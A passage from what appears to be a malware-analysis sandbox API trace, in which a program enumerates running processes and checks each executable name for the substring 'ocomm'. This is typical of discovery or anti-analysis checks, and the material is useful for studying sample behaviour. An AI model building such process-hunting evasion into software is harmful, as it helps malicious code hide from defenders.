lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0095.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0095.762] StrStrIA (lpFirst="Memory Compression", lpSrch="ocomm") returned 0x0 [0095.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0095.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0095.763] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x35749a8 [0095.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x35749a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0095.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0095.763] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="ocomm") returned 0x0 [0095.763] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0095.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.764] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573b48 [0095.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3573b48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0095.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0095.764] StrStrIA (lpFirst="SearchUI.exe", lpSrch="ocomm") returned 0x0 [0095.764] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0095.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.776] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574988 [0095.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3574988, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0095.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0095.776] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="ocomm") returned 0x0 [0095.776] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.777] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573a88 [0095.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3573a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.777] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocomm") returned 0x0 [0095.778] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0095.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.779] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573aa0 [0095.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3573aa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0095.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0095.779] StrStrIA (lpFirst="pending.exe", lpSrch="ocomm") returned 0x0 [0095.779] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0095.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.780] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356ab50 [0095.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356ab50, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0095.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0095.780] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="ocomm") returned 0x0 [0095.780] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0095.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.782] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35749e8 [0095.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35749e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0095.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0095.782] StrStrIA (lpFirst="swing prefer.exe", lpSrch="ocomm") returned 0x0 [0095.782] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0095.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.783] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356abc8 [0095.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356abc8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0095.783] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0095.783] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="ocomm") returned 0x0 [0095.783] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0095.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.785] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574a88 [0095.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3574a88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0095.785] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0095.785] StrStrIA (lpFirst="nights-attending.exe", lpSrch="ocomm") returned 0x0 [0095.785] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0095.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.786] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573c68 [0095.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3573c68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0095.786] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0095.787] StrStrIA (lpFirst="installed.exe", lpSrch="ocomm") returned 0x0 [0095.787] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0095.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.788] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356ace0 [0095.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356ace0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0095.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0095.788] StrStrIA (lpFirst="references compounds.exe", lpSrch="ocomm") returned 0x0 [0095.788] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0095.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.789] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574aa8 [0095.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3574aa8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0095.789] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0095.789] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="ocomm") returned 0x0 [0095.789] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0095.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.791] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575960 [0095.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3575960, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0095.791] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0095.791] StrStrIA (lpFirst="registered try.exe", lpSrch="ocomm") returned 0x0 [0095.791] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0095.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.792] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356aba0 [0095.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356aba0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0095.792] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0095.792] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="ocomm") returned 0x0 [0095.792] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0095.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.794] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573b00 [0095.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3573b00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0095.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0095.794] StrStrIA (lpFirst="invite.exe", lpSrch="ocomm") returned 0x0 [0095.794] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0095.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.795] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573c20 [0095.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3573c20, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0095.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0095.795] StrStrIA (lpFirst="idol.exe", lpSrch="ocomm") returned 0x0 [0095.795] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0095.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.796] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ac68 [0095.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356ac68, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0095.796] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0095.796] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="ocomm") returned 0x0 [0095.796] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0095.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.798] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ad30 [0095.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356ad30, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0095.798] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0095.798] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="ocomm") returned 0x0 [0095.798] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0095.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.799] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573b18 [0095.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3573b18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0095.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0095.799] StrStrIA (lpFirst="powell_jane.exe", lpSrch="ocomm") returned 0x0 [0095.799] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0095.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.801] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575ae0 [0095.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3575ae0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0095.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0095.801] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="ocomm") returned 0x0 [0095.801] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0095.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.802] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573b30 [0095.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3573b30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0095.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0095.803] StrStrIA (lpFirst="gainedshape.exe", lpSrch="ocomm") returned 0x0 [0095.803] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0095.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.804] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35759a0 [0095.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35759a0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0095.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0095.804] StrStrIA (lpFirst="opens-versions.exe", lpSrch="ocomm") returned 0x0 [0095.804] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0095.805] WideCharToMultiByte (in: CodePage=0x0, 